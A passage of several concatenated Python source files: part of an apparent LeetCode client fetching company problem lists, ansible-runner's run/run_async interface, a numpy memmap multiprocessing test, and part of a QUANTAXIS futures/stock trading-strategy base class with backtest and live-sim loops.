'slug': p['titleSlug'],
'paid_only': p['isPaidOnly'],
'ac_rate': stats['totalAcceptedRaw'] / stats['totalSubmissionRaw'],
'level': p['difficulty'],
'favor': False,
'frequency': id_to_frequency_map.get(p['questionId'], 0)}
return {
'topic_name': topic_tag['name'],
'problems': [process_problem(p) for p in topic_tag['questions']]}
def get_problems_of_company(company_slug):
request_body = {
'operationName':'getCompanyTag',
'variables': {'slug': company_slug},
'query': '''query getCompanyTag($slug: String!) {
companyTag(slug: $slug) {
name
translatedName
frequencies
questions {
...questionFields
}
}
}
fragment questionFields on QuestionNode {
status
questionId
questionFrontendId
title
titleSlug
translatedTitle
stats
difficulty
isPaidOnly
frequencyTimePeriod
}
'''}
headers = _make_headers()
headers['Referer'] = 'https://leetcode.com/company/{}/'.format(company_slug)
log.info('get_problems_of_company request: headers="%s" body="%s"', headers,
request_body)
res = session.post(LC_GRAPHQL, headers=headers, json=request_body)
log.info('get_problems_of_company response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get problems of the company')
return {'company_name': company_slug, 'problems': []}
company_tag = res.json()['data']['companyTag']
if not company_tag:
_echoerr('cannot get problems of the company')
return {'company_name': company_slug, 'problems': []}
if company_tag['frequencies']:
id_to_frequency_map = json.loads(company_tag['frequencies'])
else:
id_to_frequency_map = {}
def process_problem(p):
stats = json.loads(p['stats'])
return {
'state': _state_to_flag(p['status']),
'id': p['questionId'],
'fid': p['questionFrontendId'],
'title': p['title'],
'slug': p['titleSlug'],
'paid_only': p['isPaidOnly'],
'ac_rate': stats['totalAcceptedRaw'] / stats['totalSubmissionRaw'],
'level': p['difficulty'],
'favor': False,
'frequencies': id_to_frequency_map.get(p['questionId'],
EMPTY_FREQUENCIES)[4:]}
return {
'company_name': company_tag['name'],
'problems': [process_problem(p) for p in company_tag['questions']]}
def _thread_main():
global task_running, task_done, task_output, task_err
while True:
task_trigger.acquire()
task_running = True
task_done = False
task_output = None
task_err = ''
log.info('task thread input: name="%s" input="%s"', task_name, task_input)
try:
if task_name == 'test_solution':
task_output = test_solution(*task_input)
elif task_name == 'submit_solution':
task_output = submit_solution(*task_input)
except BaseException as e:
task_err = str(e)
log.info('task thread output: name="%s" output="%s" error="%s"', task_name, task_output,
task_err)
task_running = False
task_done = True
def _in_task():
return current_thread() == task_thread
def _echoerr(s):
global task_err
if _in_task():
task_err = s
else:
print(s)
task_thread = Thread(target=_thread_main, daemon=True)
task_thread.start()
|
interface.py
|
# Copyright (c) 2016 Ansible by Red Hat, Inc.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import sys
import threading
import logging
from ansible_runner import output
from ansible_runner.runner_config import RunnerConfig
from ansible_runner.runner import Runner
from ansible_runner.streaming import Transmitter, Worker, Processor
from ansible_runner.utils import (
dump_artifacts,
check_isolation_executable_installed,
)
logging.getLogger('ansible-runner').addHandler(logging.NullHandler())
def init_runner(**kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both run() and run_async()
functions in the same way and return a value instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.run`
'''
if not kwargs.get('cli_execenv_cmd'):
dump_artifacts(kwargs)
debug = kwargs.pop('debug', None)
logfile = kwargs.pop('logfile', None)
if not kwargs.pop("ignore_logging", True):
output.configure()
if debug in (True, False):
output.set_debug('enable' if debug is True else 'disable')
if logfile:
output.set_logfile(logfile)
if kwargs.get("process_isolation", False):
pi_executable = kwargs.get("process_isolation_executable", "podman")
if not check_isolation_executable_installed(pi_executable):
print(f'Unable to find process isolation executable: {pi_executable}')
sys.exit(1)
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
streamer = kwargs.pop('streamer', None)
if streamer:
if streamer == 'transmit':
stream_transmitter = Transmitter(**kwargs)
return stream_transmitter
if streamer == 'worker':
stream_worker = Worker(**kwargs)
return stream_worker
if streamer == 'process':
stream_processor = Processor(event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback,
**kwargs)
return stream_processor
kwargs.pop('_input', None)
kwargs.pop('_output', None)
rc = RunnerConfig(**kwargs)
rc.prepare()
return Runner(rc,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
def run(**kwargs):
'''
Run an Ansible Runner task in the foreground and return a Runner object when complete.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param playbook: The playbook (either supplied here as a list or string... or as a path relative to
``private_data_dir/project``) that will be invoked by runner when executing Ansible.
:param module: The module that will be invoked in ad-hoc mode by runner when executing Ansible.
:param module_args: The module arguments that will be supplied to ad-hoc mode.
:param host_pattern: The host pattern to match when running in ad-hoc mode.
:param inventory: Overrides the inventory directory/file (supplied at ``private_data_dir/inventory``) with
a specific host or list of hosts. This can take the form of
- Path to the inventory file in the ``private_data_dir``
- Native python dict supporting the YAML/json inventory structure
- A text INI formatted string
- A list of inventory sources, or an empty list to disable passing inventory
:param roles_path: Directory or list of directories to assign to ANSIBLE_ROLES_PATH
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param extravars: Extra variables to be passed to Ansible at runtime using ``-e``. Extra vars will also be
read from ``env/extravars`` in ``private_data_dir``.
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param cmdline: Command line options passed to Ansible read from ``env/cmdline`` in ``private_data_dir``
:param limit: Matches ansible's ``--limit`` parameter to further constrain the inventory to be used
:param forks: Control Ansible parallel concurrency
:param verbosity: Control how verbose the output of ansible-playbook is
:param quiet: Disable all output
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param streamer: Optionally invoke ansible-runner as one of the steps in the streaming pipeline
:param _input: An optional file or file-like object for use as input in a streaming pipeline
:param _output: An optional file or file-like object for use as output in a streaming pipeline
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:param process_isolation: Enable process isolation, using either a container engine (e.g. podman) or a sandbox (e.g. bwrap).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param process_isolation_path: Path that an isolated playbook run will use for staging. (default: /tmp)
:param process_isolation_hide_paths: A path or list of paths on the system that should be hidden from the playbook run.
:param process_isolation_show_paths: A path or list of paths on the system that should be exposed to the playbook run.
:param process_isolation_ro_paths: A path or list of paths on the system that should be exposed to the playbook run as read-only.
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir. (default: None)
:param container_options: List of container options to pass to execution engine.
:param resource_profiling: Enable collection of resource utilization data during playbook execution.
:param resource_profiling_base_cgroup: Name of existing cgroup which will be sub-grouped in order to measure resource utilization (default: ansible-runner)
:param resource_profiling_cpu_poll_interval: Interval (in seconds) between CPU polling for determining CPU usage (default: 0.25)
:param resource_profiling_memory_poll_interval: Interval (in seconds) between memory polling for determining memory usage (default: 0.25)
:param resource_profiling_pid_poll_interval: Interval (in seconds) between polling PID count for determining number of processes used (default: 0.25)
:param resource_profiling_results_dir: Directory where profiling data files should be saved (defaults to profiling_data folder inside private data dir)
:param directory_isolation_base_path: An optional path will be used as the base path to create a temp directory, the project contents will be
copied to this location which will then be used as the working directory during playbook execution.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param omit_event_data: Omits extra ansible event data from event payload (stdout and event still included)
:param only_failed_event_data: Omits extra ansible event data unless it's a failed event (stdout and event still included)
:param cli_execenv_cmd: Tells Ansible Runner to emulate the CLI of Ansible by prepping an Execution Environment and then passing the user provided cmdline
:type private_data_dir: str
:type ident: str
:type json_mode: bool
:type playbook: str or filename or list
:type inventory: str or dict or list
:type envvars: dict
:type extravars: dict
:type passwords: dict
:type settings: dict
:type ssh_key: str
:type artifact_dir: str
:type project_dir: str
:type rotate_artifacts: int
:type cmdline: str
:type limit: str
:type forks: int
:type quiet: bool
:type verbosity: int
:type streamer: str
:type _input: file
:type _output: file
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:type process_isolation: bool
:type process_isolation_executable: str
:type process_isolation_path: str
:type process_isolation_hide_paths: str or list
:type process_isolation_show_paths: str or list
:type process_isolation_ro_paths: str or list
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type resource_profiling: bool
:type resource_profiling_base_cgroup: str
:type resource_profiling_cpu_poll_interval: float
:type resource_profiling_memory_poll_interval: float
:type resource_profiling_pid_poll_interval: float
:type resource_profiling_results_dir: str
:type directory_isolation_base_path: str
:type fact_cache: str
:type fact_cache_type: str
:type omit_event_data: bool
:type only_failed_event_data: bool
:type cli_execenv_cmd: str
:returns: A :py:class:`ansible_runner.runner.Runner` object, or a simple object containing `rc` if run remotely
'''
r = init_runner(**kwargs)
r.run()
return r
def run_async(**kwargs):
'''
Runs an Ansible Runner task in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.run`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_runner(**kwargs)
runner_thread = threading.Thread(target=r.run)
runner_thread.start()
return runner_thread, r
|
test_memmap.py
|
# -*- coding: utf-8 -*-
# ================================================================
# Don't go gently into that good night.
#
# author: klaus
# description:
#
# ================================================================
import multiprocessing
import numpy as np
def print_matrix(filename):
matrix = np.memmap(filename, dtype="int16", mode="r", shape=(100, 100))
print(matrix)
def main():
filename = "test.dat"
matrix = np.memmap(filename, dtype="int16", mode="w+", shape=(100, 100))
matrix[0] = -2
matrix.flush()
print(matrix)
p = multiprocessing.Process(target=print_matrix, args=(filename,))
p.start()
p.join()
print(matrix)
if __name__ == "__main__":
main()
|
qactabase.py
|
import copy
import datetime
import json
import os
import re
import sys
import threading
import time
import uuid
import pandas as pd
import pymongo
import requests
import asyncio
from qaenv import (eventmq_amqp, eventmq_ip, eventmq_password, eventmq_port,
eventmq_username, mongo_ip, mongo_uri)
from QAPUBSUB.consumer import subscriber, subscriber_routing, subscriber_topic
from QAPUBSUB.producer import publisher_routing, publisher_topic
import QUANTAXIS as QA
from QAStrategy.util import QA_data_futuremin_resample
from QIFIAccount import ORDER_DIRECTION, QIFI_Account
from QUANTAXIS.QAARP import QA_Risk, QA_User
from QUANTAXIS.QAEngine.QAThreadEngine import QA_Thread
from QUANTAXIS.QAUtil.QAParameter import MARKET_TYPE, RUNNING_ENVIRONMENT
from QUANTAXIS.QAData.QADataStruct import QA_DataStruct_Stock_min
class QAStrategyCTABase():
def __init__(self, code='rb2005', frequence='1min', strategy_id='QA_STRATEGY', risk_check_gap=1,
portfolio='default',
start='2020-01-01', end='2020-05-21', init_cash=1000000, send_wx=False,
data_host=eventmq_ip, data_port=eventmq_port, data_user=eventmq_username, data_password=eventmq_password,
trade_host=eventmq_ip, trade_port=eventmq_port, trade_user=eventmq_username, trade_password=eventmq_password,
taskid=None, mongo_ip=mongo_ip, model='py'):
"""
code 可以传入单个标的 也可以传入一组标的(list)
会自动基于code来判断是什么市场
TODO: 支持多个市场同时存在
self.trade_host 交易所在的eventmq的ip [挂ORDER_ROUTER的]
/
"""
self.username = 'admin'
self.password = 'admin'
self.trade_host = trade_host
self.code = code
self.frequence = frequence
self.strategy_id = strategy_id
self.portfolio = portfolio
self.data_host = data_host
self.data_port = data_port
self.data_user = data_user
self.data_password = data_password
self.trade_host = trade_host
self.trade_port = trade_port
self.trade_user = trade_user
self.trade_password = trade_password
self.start = start
self.end = end
self.init_cash = init_cash
self.taskid = taskid
self.running_time = ''
self.market_preset = QA.QAARP.MARKET_PRESET()
self._market_data = []
self.risk_check_gap = risk_check_gap
self.latest_price = {}
self.isupdate = False
self.model = model
self.new_data = {}
self._systemvar = {}
self._signal = []
self.send_wx = send_wx
if isinstance(self.code, str):
self.last_order_towards = {self.code: {'BUY': '', 'SELL': ''}}
else:
self.last_order_towards = dict(
zip(self.code, [{'BUY': '', 'SELL': ''} for i in range(len(self.code))]))
self.dt = ''
if isinstance(self.code, str):
self.market_type = MARKET_TYPE.FUTURE_CN if re.search(
r'[a-zA-z]+', self.code) else MARKET_TYPE.STOCK_CN
else:
self.market_type = MARKET_TYPE.FUTURE_CN if re.search(
r'[a-zA-z]+', self.code[0]) else MARKET_TYPE.STOCK_CN
self.bar_order = {'BUY_OPEN': 0, 'SELL_OPEN': 0,
'BUY_CLOSE': 0, 'SELL_CLOSE': 0}
self._num_cached = 120
self._cached_data = []
self.user_init()
# 实盘参数
self.stop_actual_thread = True
self.actual_thread: threading.Thread = None
self.stock_name = 'stock_name_un_set'
@property
def bar_id(self):
return len(self._market_data)
@property
def BarsSinceEntryLong(self):
return self.bar_id - self.bar_order.get('BUY_OPEN', self.bar_id)
@property
def BarsSinceEntryShort(self):
return self.bar_id - self.bar_order.get('SELL_OPEN', self.bar_id)
@property
def EntryPriceLong(self):
code = self.get_code()
return self.get_positions(code).open_price_long
@property
def EntryPriceShort(self):
code = self.get_code()
return self.get_positions(code).open_price_short
def on_sync(self):
if self.running_mode != 'backtest':
self.pubacc.pub(json.dumps(self.acc.message),
routing_key=self.strategy_id)
def _debug_sim(self):
self.running_mode = 'sim'
if self.frequence.endswith('min'):
if isinstance(self.code, str):
self._old_data = QA.QA_fetch_get_future_min('tdx', self.code.upper(), QA.QA_util_get_last_day(
QA.QA_util_get_real_date(str(datetime.date.today()))), str(datetime.datetime.now()),
self.frequence)[:-1].set_index(['datetime', 'code'])
self._old_data = self._old_data.assign(volume=self._old_data.trade).loc[:, [
'open', 'high', 'low',
'close', 'volume']]
else:
self._old_data = pd.concat([QA.QA_fetch_get_future_min('tdx', item.upper(), QA.QA_util_get_last_day(
QA.QA_util_get_real_date(str(datetime.date.today()))), str(datetime.datetime.now()),
self.frequence)[:-1].set_index(
['datetime', 'code']) for item in self.code], sort=False)
self._old_data = self._old_data.assign(volume=self._old_data.trade).loc[:, [
'open', 'high', 'low',
'close', 'volume']]
else:
self._old_data = pd.DataFrame()
self.database = pymongo.MongoClient(mongo_ip).QAREALTIME
self.client = self.database.account
self.subscriber_client = self.database.subscribe
self.acc = QIFI_Account(
username=self.strategy_id, password=self.strategy_id, trade_host=mongo_ip, init_cash=self.init_cash)
self.acc.initial()
self.acc.on_sync = self.on_sync
self.pub = publisher_routing(exchange='QAORDER_ROUTER', host=self.trade_host,
port=self.trade_port, user=self.trade_user, password=self.trade_password)
self.pubacc = publisher_topic(exchange='QAAccount', host=self.trade_host,
port=self.trade_port, user=self.trade_user, password=self.trade_password)
if isinstance(self.code, str):
self.subscribe_data(self.code.lower(), self.frequence, self.data_host,
self.data_port, self.data_user, self.data_password, self.model)
else:
self.subscribe_multi(self.code, self.frequence, self.data_host,
self.data_port, self.data_user, self.data_password, self.model)
print('account {} start sim'.format(self.strategy_id))
self.database.strategy_schedule.job_control.update(
{'strategy_id': self.strategy_id},
{'strategy_id': self.strategy_id, 'taskid': self.taskid,
'filepath': os.path.abspath(__file__), 'status': 200}, upsert=True)
def debug_actual(self):
print(f'{self.code} enter debug actual 开始调试实盘.')
self.actual_thread = threading.Thread(target=self.run_actual_sim_loop, daemon=True)
self.actual_thread.start()
self.actual_thread.join()
def loop_actual_tick(self):
last_ts = self.actual_tick_check()
async def loop_actual_async(self):
print(f'{self.code} enter debug actual 开始asyncio实盘.')
await self.run_async_actual_loop()
async def run_async_actual_loop(self):
self.stop_actual_thread = False
self.ready_sleep = 1
while not self.stop_actual_thread:
# print(f'{self.code} qa cta base run loop. {"Daemon" if self.actual_thread.isDaemon() else "not Daemon"} Thread.')
last_ts = self.actual_tick_check()
now_ts = datetime.datetime.now()
timedelta = last_ts + datetime.timedelta(minutes=5) - now_ts
#
if timedelta > datetime.timedelta(seconds=5):
self.ready_sleep = timedelta.seconds - 3
else:
self.ready_sleep = 1
# 如果当前时间超过下午3点, 则休眠10分钟, 或者在早上9点之前, 则休眠5分钟
if datetime.time(hour=9, minute=5) > now_ts.time() or now_ts.time() > datetime.time(hour=15, minute=10):
next_wakeup_time = datetime.datetime.combine(now_ts.date() + datetime.timedelta(days=1), datetime.time(hour=9, minute=5))
self.ready_sleep = (next_wakeup_time - now_ts).seconds
print(f'{datetime.datetime.now()} {self.code} ready sleep {self.ready_sleep}')
await asyncio.sleep(self.ready_sleep)
def run_actual_sim_loop(self):
self.stop_actual_thread = False
self.ready_sleep = 1
while not self.stop_actual_thread:
# print(f'{self.code} qa cta base run loop. {"Daemon" if self.actual_thread.isDaemon() else "not Daemon"} Thread.')
last_ts = self.actual_tick_check()
now_ts = datetime.datetime.now()
timedelta = last_ts + datetime.timedelta(minutes=5) - now_ts
#
if timedelta > datetime.timedelta(seconds=5):
self.ready_sleep = timedelta.seconds - 3
else:
self.ready_sleep = 1
# 如果当前时间超过下午3点, 则休眠10分钟, 或者在早上9点之前, 则休眠5分钟
if datetime.time(hour=9, minute=5) > now_ts.time() or now_ts.time() > datetime.time(hour=15, minute=10):
self.ready_sleep = 60 * 10
print(f'{datetime.datetime.now()} {self.code} ready sleep {self.ready_sleep}')
time.sleep(self.ready_sleep)
def actual_tick_check(self):
if len(self._market_data) == 0:
return
last_index = self.market_data.index[-1]
code = last_index[1]
last_timestamp = last_index[0]
# 获取当前时间
now_timestamp = datetime.datetime.now()
now_str = str(now_timestamp)[:19]
# print(f'当前股票的代码是 {self.code}')
# print(f'{now_str}: 当前股票最后一条的数据时间是 {last_timestamp}')
res = QA.QAFetch.QATdx.QA_fetch_get_stock_min(code, last_timestamp, now_str, '5min')
res = res.rename(columns={"vol": "volume"})
# .drop(
# ['date', 'datetime', 'date_stamp', 'time_stamp'], axis=1)
# res.index = pd.to_datetime(res.index)
res = QA_DataStruct_Stock_min(res.set_index(['datetime', 'code']))
apply_data: QA_DataStruct_Stock_min = res
apply_df: pd.DataFrame = apply_data.data
# 这里要删除多余的 index, 比如时间是重复的, 还有当前时间未达到那个时间戳.
drop_index = []
cut_timestamp = now_timestamp - datetime.timedelta(hours=3)
cut_str = str(cut_timestamp)[:19]
cut_str = now_str
for index, row in apply_df.iterrows():
str_index_ts = str(last_index[0])
if index[0] <= str_index_ts or index[0] > cut_str:
drop_index.append(index)
else:
# print(f'{self.code} fetch new data with timestamp {index[0]}')
pass
apply_df = apply_df.drop(index=drop_index)
# print(data)
# 重新取一次timestamp
apply_df.apply(self.x1, axis=1)
last_index = self.market_data.index[-1]
code = last_index[1]
last_timestamp = last_index[0]
if isinstance(last_timestamp, str):
last_timestamp = datetime.datetime.strptime(last_timestamp, '%Y-%m-%d %H:%M:%S')
return last_timestamp
def debug_sim(self):
self._debug_sim()
threading.Thread(target=self.sub.start, daemon=True).start()
def run_sim(self):
self._debug_sim()
self.sub.start()
def run_backtest(self):
self.debug()
self.acc.save()
risk = QA_Risk(self.acc)
risk.save()
try:
"""add rank flow if exist
QARank是我们内部用于评价策略ELO的库 此处并不影响正常使用
"""
from QARank import QA_Rank
QA_Rank(self.acc).send()
except:
pass
def user_init(self):
"""
用户自定义的init过程
"""
pass
def debug(self):
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type, frequence=self.frequence)
self.positions = self.acc.get_position(self.code)
print(self.acc)
print(self.acc.market_type)
data = QA.QA_quotation(self.code.upper(), self.start, self.end, source=QA.DATASOURCE.MONGO,
frequence=self.frequence, market=self.market_type, output=QA.OUTPUT_FORMAT.DATASTRUCT)
data.data.apply(self.x1, axis=1)
def x1(self, item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
self.on_dailyopen()
if self.market_type == QA.MARKET_TYPE.STOCK_CN:
print(f'backtest: Settle! {self.code} {str(item.name[0])[0:10]}')
self.acc.settle()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
def debug_t0(self):
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, init_hold={
self.code: 100000},
market_type=self.market_type, running_environment=RUNNING_ENVIRONMENT.TZERO)
self.positions = self.acc.get_position(self.code)
data = QA.QA_quotation(self.code.upper(), self.start, self.end, source=QA.DATASOURCE.MONGO,
frequence=self.frequence, market=self.market_type, output=QA.OUTPUT_FORMAT.DATASTRUCT)
def x1(item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
for order in self.acc.close_positions_order:
order.trade('closebySys', order.price,
order.amount, order.datetime)
self.on_dailyopen()
if self.market_type == QA.MARKET_TYPE.STOCK_CN:
print('backtest: Settle!')
self.acc.settle()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
data.data.apply(x1, axis=1)
def debug_currenttick(self, freq):
data = QA.QA_fetch_get_future_transaction_realtime(
'tdx', self.code.upper())
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.strategy_id = self.strategy_id + \
'currenttick_{}_{}'.format(str(datetime.date.today()), freq)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type)
self.positions = self.acc.get_position(self.code)
data = data.assign(price=data.price / 1000).loc[:, ['code', 'price', 'volume']].resample(
freq).apply({'code': 'last', 'price': 'ohlc', 'volume': 'sum'}).dropna()
data.columns = data.columns.droplevel(0)
data = data.reset_index().set_index(['datetime', 'code'])
def x1(item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
self.on_dailyopen()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
data.apply(x1, axis=1)
def debug_histick(self, freq):
data = QA.QA_fetch_get_future_transaction(
'tdx', self.code.upper(), self.start, self.end)
self.running_mode = 'backtest'
self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS
user = QA_User(username=self.username, password=self.password)
port = user.new_portfolio(self.portfolio)
self.strategy_id = self.strategy_id + \
'histick_{}_{}_{}'.format(self.start, self.end, freq)
self.acc = port.new_accountpro(
account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type)
self.positions = self.acc.get_position(self.code)
data = data.assign(price=data.price / 1000).loc[:, ['code', 'price', 'volume']].resample(
freq).apply({'code': 'last', 'price': 'ohlc', 'volume': 'sum'}).dropna()
data.columns = data.columns.droplevel(0)
data = data.reset_index().set_index(['datetime', 'code'])
def x1(item):
self.latest_price[item.name[1]] = item['close']
if str(item.name[0])[0:10] != str(self.running_time)[0:10]:
self.on_dailyclose()
self.on_dailyopen()
self._on_1min_bar()
self._market_data.append(copy.deepcopy(item))
self.running_time = str(item.name[0])
self.on_bar(item)
data.apply(x1, axis=1)
def subscribe_data(self, code, frequence, data_host, data_port, data_user, data_password, model='py'):
"""[summary]
Arguments:
code {[type]} -- [description]
frequence {[type]} -- [description]
"""
if frequence.endswith('min'):
if model == 'py':
self.sub = subscriber(exchange='realtime_{}_{}'.format(
frequence, code), host=data_host, port=data_port, user=data_user, password=data_password)
elif model == 'rust':
self.sub = subscriber_routing(exchange='realtime_{}'.format(
code), routing_key=frequence, host=data_host, port=data_port, user=data_user, password=data_password)
self.sub.callback = self.callback
elif frequence.endswith('s'):
import re
self._num_cached = 2 * int(re.findall(r'\d+', self.frequence)[0])
self.sub = subscriber_routing(
exchange='CTPX', routing_key=code, host=data_host, port=data_port, user=data_user, password=data_password)
self.sub.callback = self.second_callback
elif frequence.endswith('tick'):
self._num_cached = 1
self.sub = subscriber_routing(
exchange='CTPX', routing_key=code, host=data_host, port=data_port, user=data_user, password=data_password)
self.sub.callback = self.tick_callback
def subscribe_multi(self, codelist, frequence, data_host, data_port, data_user, data_password, model='py'):
if frequence.endswith('min'):
if model == 'rust':
self.sub = subscriber_routing(exchange='realtime_{}'.format(
codelist[0]), routing_key=frequence, host=data_host, port=data_port, user=data_user,
password=data_password)
for item in codelist[1:]:
self.sub.add_sub(exchange='realtime_{}'.format(
item), routing_key=frequence)
elif model == 'py':
self.sub = subscriber_routing(exchange='realtime_{}'.format(
codelist[0].lower()), routing_key=frequence, host=data_host, port=data_port, user=data_user,
password=data_password)
for item in codelist[1:]:
self.sub.add_sub(exchange='realtime_{}'.format(
item.lower()), routing_key=frequence)
self.sub.callback = self.callback
elif frequence.endswith('tick'):
self._num_cached = 1
self.sub = subscriber_routing(exchange='CTPX', routing_key=codelist[0].lower(
), host=data_host, port=data_port, user=data_user, password=data_password)
for item in codelist[1:]:
self.sub.add_sub(exchange='CTPX', routing_key=item.lower())
self.sub.callback = self.tick_callback
@property
def old_data(self):
return self._old_data
def update(self):
"""
此处是切换bar的时候的节点
"""
self._old_data = self._market_data
self._on_1min_bar()
@property
def market_datetime(self):
"""计算的market时间点 此api慎用 因为会惰性计算全市场的值
Returns:
[type] -- [description]
"""
return self.market_data.index.levels[0]
@property
def market_data(self):
if self.running_mode == 'sim':
return self._market_data
elif self.running_mode == 'backtest':
return pd.concat(self._market_data[-100:], axis=1, sort=False).T
def force_close(self):
# 强平
if self.positions.volume_long > 0:
self.send_order('SELL', 'CLOSE', price=self.positions.last_price,
volume=self.positions.volume_long)
if self.positions.volume_short > 0:
self.send_order('BUY', 'CLOSE', price=self.positions.last_price,
volume=self.positions.volume_short)
def upcoming_data(self, new_bar):
"""upcoming_bar :
在这一步中, 我们主要进行的是
1. 更新self._market_data
2. 更新账户
3. 更新持仓
4. 通知on_bar
Arguments:
new_bar {pd.DataFrame} -- [description]
"""
code = new_bar.index.levels[1][0]
if len(self._old_data) > 0:
self._market_data = pd.concat(
[self._old_data, new_bar], sort=False)
else:
self._market_data = new_bar
# QA.QA_util_log_info(self._market_data)
if self.isupdate:
self.update()
self.isupdate = False
self.update_account()
if isinstance(self.code, str):
self.positions.on_price_change(float(self.latest_price[code]))
else:
for item in self.code:
self.acc.get_position(item).on_price_change(
float(self.latest_price[code]))
self.on_bar(json.loads(
new_bar.reset_index().to_json(orient='records'))[0])
def ind2str(self, ind, ind_type):
z = ind.tail(1).reset_index().to_dict(orient='records')[0]
return json.dumps({'topic': ind_type, 'code': self.code, 'type': self.frequence, 'data': z})
def second_callback(self, a, b, c, body):
"""在strategy的callback中,我们需要的是
1. 更新数据
2. 更新bar
3. 更新策略状态
4. 推送事件
Arguments:
a {[type]} -- [description]
b {[type]} -- [description]
c {[type]} -- [description]
body {[type]} -- [description]
second ==> 2*second tick
b'{"ask_price_1": 4145.0, "ask_price_2": 0, "ask_price_3": 0, "ask_price_4": 0, "ask_price_5": 0,
"ask_volume_1": 69, "ask_volume_2": 0, "ask_volume_3": 0, "ask_volume_4": 0, "ask_volume_5": 0,
"average_price": 61958.14258714826,
"bid_price_1": 4143.0, "bid_price_2": 0, "bid_price_3": 0, "bid_price_4": 0, "bid_price_5": 0,
"bid_volume_1": 30, "bid_volume_2": 0, "bid_volume_3": 0, "bid_volume_4": 0, "bid_volume_5": 0,
"datetime": "2019-11-20 01:57:08", "exchange": "SHFE", "gateway_name": "ctp",
"high_price": 4152.0, "last_price": 4144.0, "last_volume": 0,
"limit_down": 3872.0, "limit_up": 4367.0, "local_symbol": "ag1912.SHFE",
"low_price": 4105.0, "name": "", "open_interest": 277912.0, "open_price": 4140.0,
"preSettlementPrice": 4120.0, "pre_close": 4155.0,
"symbol": "ag1912",
"volume": 114288}'
tick 会基于热数据的量 self._num_cached 来判断更新/重采样
"""
self.new_data = json.loads(str(body, encoding='utf-8'))
self._cached_data.append(self.new_data)
